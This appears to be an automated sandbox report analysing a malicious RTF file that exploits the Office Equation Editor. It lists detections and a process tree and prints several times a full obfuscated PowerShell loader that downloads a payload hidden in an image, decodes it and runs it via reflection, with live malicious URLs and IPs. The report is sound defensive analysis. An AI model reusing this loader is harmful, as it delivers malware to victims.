Edit tour

Windows Analysis Report
4YlwTsmpuZ.rtf

Overview

General Information

Sample name:	4YlwTsmpuZ.rtf renamed because original name is a hash value
Original sample name:	9904916ce3549610216e99d83e7e2135.rtf
Analysis ID:	1466761
MD5:	9904916ce3549610216e99d83e7e2135
SHA1:	d5eefab14ee9d5afa6258d3b399b46f779a56901
SHA256:	a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
Tags:	rtf
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Obfuscated command line found

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2980 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2436 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

EQNEDT32.EXE (PID: 3404 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
4YlwTsmpuZ.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1ad3:$obj2: \objdata 0x1abb:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 3200	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3200	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x11acc:$b2: ::FromBase64String( 0x1357c:$b2: ::FromBase64String( 0x10a7a:$b3: ::UTF8.GetString( 0x118f9:$b3: ::UTF8.GetString( 0x133dd:$b3: ::UTF8.GetString( 0xd4bb0:$b3: ::UTF8.GetString( 0xeaed2:$b3: ::UTF8.GetString( 0x14027f:$b3: ::UTF8.GetString( 0x140f59:$b3: ::UTF8.GetString( 0x19aa4d:$b3: ::UTF8.GetString( 0x19b012:$b3: ::UTF8.GetString( 0x19b7f8:$b3: ::UTF8.GetString( 0x19bf7e:$b3: ::UTF8.GetString( 0x19f312:$b3: ::UTF8.GetString( 0x1bad3b:$b3: ::UTF8.GetString( 0x1bb2fe:$b3: ::UTF8.GetString( 0x1bd9e0:$b3: ::UTF8.GetString( 0x1bdffa:$b3: ::UTF8.GetString( 0x1c2238:$b3: ::UTF8.GetString( 0x1c78cb:$b3: ::UTF8.GetString( 0x1cc781:$b3: ::UTF8.GetString(

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.235.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2436, TargetFilename: C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 23.95.235.16, SourceIsIpv6: false, SourcePort: 80

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

Author: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3140, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3140, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2436, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3200, TargetFilename: C:\Users\user\AppData\Local\Temp\vjz3rtmh.qm2.ps1

Snort Signatures

ET TROJAN Malicious Base64 Encoded Payload In Image - Source IP: 91.92.254.29 - Destination IP: 192.168.2.22

Timestamp:	07/03/24-11:08:43.238447
SID:	2049038
Source Port:	80
Destination Port:	49162
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 4YlwTsmpuZ.rtf

Avira: detected

Multi AV Scanner detection for domain / URL

Source: uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br	Virustotal: Detection: 6%	Perma Link
Source: http://uploaddeimagens.com.br	Virustotal: Detection: 5%	Perma Link
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for submitted file

Source: 4YlwTsmpuZ.rtf	Virustotal: Detection: 52%			Perma Link
Source: 4YlwTsmpuZ.rtf	ReversingLabs: Detection: 50%

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

